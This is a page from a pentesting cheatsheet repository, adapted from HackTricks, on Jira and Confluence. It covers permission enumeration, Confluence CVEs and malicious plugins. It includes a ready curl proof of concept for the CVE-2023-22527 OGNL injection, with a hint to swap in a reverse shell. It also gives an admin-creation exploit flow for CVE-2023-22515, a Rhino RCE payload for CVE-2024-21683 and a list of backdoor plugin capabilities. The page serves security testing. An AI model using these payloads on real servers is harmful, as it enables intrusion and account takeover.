daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

jira.md (9296B)


      1 ---
      2 title: "Jira & Confluence"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/jira.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/jira.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Jira & Confluence
     14 
     15 ## Check Privileges
     16 
     17 In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**.
     18 
     19 An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)<sup>[[3]](#references)</sup>
     20 
     21 - ADD_COMMENTS
     22 - ADMINISTER
     23 - ADMINISTER_PROJECTS
     24 - ASSIGNABLE_USER
     25 - ASSIGN_ISSUES
     26 - BROWSE_PROJECTS
     27 - BULK_CHANGE
     28 - CLOSE_ISSUES
     29 - CREATE_ATTACHMENTS
     30 - CREATE_ISSUES
     31 - CREATE_PROJECT
     32 - CREATE_SHARED_OBJECTS
     33 - DELETE_ALL_ATTACHMENTS
     34 - DELETE_ALL_COMMENTS
     35 - DELETE_ALL_WORKLOGS
     36 - DELETE_ISSUES
     37 - DELETE_OWN_ATTACHMENTS
     38 - DELETE_OWN_COMMENTS
     39 - DELETE_OWN_WORKLOGS
     40 - EDIT_ALL_COMMENTS
     41 - EDIT_ALL_WORKLOGS
     42 - EDIT_ISSUES
     43 - EDIT_OWN_COMMENTS
     44 - EDIT_OWN_WORKLOGS
     45 - LINK_ISSUES
     46 - MANAGE_GROUP_FILTER_SUBSCRIPTIONS
     47 - MANAGE_SPRINTS_PERMISSION
     48 - MANAGE_WATCHERS
     49 - MODIFY_REPORTER
     50 - MOVE_ISSUES
     51 - RESOLVE_ISSUES
     52 - SCHEDULE_ISSUES
     53 - SET_ISSUE_SECURITY
     54 - SYSTEM_ADMIN
     55 - TRANSITION_ISSUES
     56 - USER_PICKER
     57 - VIEW_AGGREGATED_DATA
     58 - VIEW_DEV_TOOLS
     59 - VIEW_READONLY_WORKFLOW
     60 - VIEW_VOTERS_AND_WATCHERS
     61 - WORK_ON_ISSUES
     62 
     63 Example: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`
     64 
     65 ```bash
     66 #Check non-authenticated privileges
     67 curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
     68 ```
     69 
     70 ## Automated enumeration
     71 
     72 - [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
     73 - [https://github.com/bcoles/jira_scan](https://github.com/bcoles/jira_scan)
     74 
     75 ## Recent RCEs & practical exploit notes (Confluence)
     76 
     77 ### CVE-2023-22527 – unauthenticated template/OGNL injection (10.0)
     78 
     79 * Affects Confluence Data Center/Server 8.0.x–8.5.3 & 8.4.5. Vulnerable Velocity template `text-inline.vm` allows OGNL evaluation without authentication.<sup>[[1]](#references)</sup>
     80 * Quick PoC (command runs as confluence user):
     81 
     82 ```bash
     83 curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
     84   -H 'Content-Type: application/x-www-form-urlencoded' \
     85   --data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'
     86 ```
     87 
     88 * Response header `x-cmd` will contain the command output. Swap `id` for a reverse shell payload.
     89 * Scanner: nuclei template `http/cves/2023/CVE-2023-22527.yaml` (ships in nuclei-templates ≥9.7.5).
     90 
     91 ### CVE-2023-22515 – setup reactivation admin creation (auth bypass)
     92 
     93 * Publicly reachable Confluence Data Center/Server 8.0.0–8.5.1 allows flipping `setupComplete` and re‑running `/setup/setupadministrator.action` to create a new admin account.<sup>[[2]](#references)</sup>
     94 * Minimal exploit flow:
     95   1. `GET /server-info.action` (unauthenticated) to ensure reachability.
     96   2. `POST /server-info.action` with `buildNumber` parameters to toggle setup flag.
     97   3. `POST /setup/setupadministrator.action` with `fullName`, `email`, `username`, `password`, `confirm` to spawn an admin.
     98 
     99 ### CVE-2024-21683 – authenticated RCE via Code Macro upload
    100 
    101 * A Confluence administrator can upload a crafted language definition through **Configure Code Macro**; affected versions pass tainted content to the Rhino script engine, leading to RCE.<sup>[[6]](#references)</sup>
    102 * For a shell, upload a `.lang` file containing payload like:
    103 
    104 ```xml
    105 <?xml version="1.0"?>
    106 <languages>
    107   <language key="pwn" name="pwn" namespace="java.lang">
    108     <tokens>
    109       <token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
    110     </tokens>
    111   </language>
    112 </languages>
    113 ```
    114 
    115 * Trigger by selecting the malicious language in any Code Macro body. Metasploit module `exploit/multi/http/atlassian_confluence_rce_cve_2024_21683` automates auth + upload + exec.
    116 
    117 ## Atlassian Plugins
    118 
    119 As indicated in this [**blog**](https://cyllective.com/blog/posts/atlassian-audit-plugins)<sup>[[4]](#references)</sup>, in the documentation about [Plugin modules ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/plugin-modules/) it's possible to check the different types of plugins, like:
    120 
    121 - [REST Plugin Module ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/rest-plugin-module): Expose RESTful API endpoints
    122 - [Servlet Plugin Module ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/servlet-plugin-module/): Deploy Java servlets as part of a plugin
    123 - [Macro Plugin Module ↗](https://developer.atlassian.com/server/confluence/macro-module/): Implement Confluence Macros, i.e. parameterised HTML templates
    124 
    125 This is an example of the macro plugin type:
    126 
    127 <details>
    128 <summary>Macro plugin example</summary>
    129 
    130 ```java
    131 package com.atlassian.tutorial.macro;
    132 
    133 import com.atlassian.confluence.content.render.xhtml.ConversionContext;
    134 import com.atlassian.confluence.macro.Macro;
    135 import com.atlassian.confluence.macro.MacroExecutionException;
    136 
    137 import java.util.Map;
    138 
    139 public class helloworld implements Macro {
    140 
    141     public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException {
    142         if (map.get("Name") != null) {
    143             return ("<h1>Hello " + map.get("Name") + "!</h1>");
    144         } else {
    145             return "<h1>Hello World!<h1>";
    146         }
    147     }
    148 
    149     public BodyType getBodyType() { return BodyType.NONE; }
    150 
    151     public OutputType getOutputType() { return OutputType.BLOCK; }
    152 }
    153 ```
    154 
    155 </details>
    156 
    157 It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user.
    158 
    159 Once a XSS is found, in [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) you can find some payloads to increase the impact of the XSS.
    160 
    161 ## Backdoor Plugin
    162 
    163 [**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin) describes different (malicious) actions that could perform a malicious Jira plugin.<sup>[[5]](#references)</sup> You can find [**code example in this repo**](https://github.com/cyllective/malfluence).
    164 
    165 These are some of the actions a malicious plugin could perform:
    166 
    167 - **Hiding Plugins from Admins**: A malicious plugin can inject front-end JavaScript that hides the plugin from administrators.
    168 - **Exfiltrating Attachments and Pages**: A plugin can access and exfiltrate Confluence data available to its execution context.
    169 - **Stealing Session Tokens**: A plugin can add an endpoint that echoes request headers and JavaScript that sends session data to it.
    170 - **Command Execution**: A malicious server-side plugin can execute operating-system commands.
    171 - **Reverse Shell**: Or get a reverse shell.
    172 - **DOM Proxying**: If the confluence is inside a private network, it would be possible to establish a connection through the browser of some user with access to it and for example contact the server command executing through it.
    173 
    174 ## References
    175 
    176 - [1] [Atlassian advisory – CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html)
    177 - [2] [CISA AA23-289A – Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a)
    178 - [3] [Atlassian – 'mypermissions' resource requires a permissions query parameter](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)
    179 - [4] [Auditing Atlassian Plugins, 53 0-Days Later](https://cyllective.com/blog/posts/atlassian-audit-plugins)
    180 - [5] [Creating a Malicious Atlassian Plugin](https://cyllective.com/blog/posts/atlassian-malicious-plugin)
    181 - [6] [Rapid7 – Atlassian Confluence Administrator Code Macro RCE (CVE-2024-21683)](https://www.rapid7.com/db/vulnerabilities/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683/)